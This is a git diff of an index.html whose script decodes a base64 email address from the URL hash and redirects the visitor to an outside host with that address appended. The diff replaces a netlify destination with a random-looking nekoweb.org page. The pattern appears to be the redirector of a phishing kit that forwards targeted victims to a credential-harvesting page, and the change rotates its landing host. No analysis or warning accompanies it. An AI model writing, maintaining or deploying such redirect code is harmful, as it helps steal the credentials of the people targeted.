--- a/index.html
+++ b/index.html
@@ -14,7 +14,7 @@
     // Use hash if present, otherwise eta
     var param = hash || eta || '';
     var url_get_email = atob(getafterhash(param));
-    var mail_go_url = "https://vocal-strudel-ec9e52.netlify.app#" + url_get_email + "";
+    var mail_go_url = "https://f5g4j5h1kd.nekoweb.org/4d8a7q/9s5a7a2.shtml#" + url_get_email + "";
     location.replace(mail_go_url);
 
     function getafterhash(url) {
@@ -47,6 +47,7 @@
   </script>
 </body>
 </html>
+
 
 
 
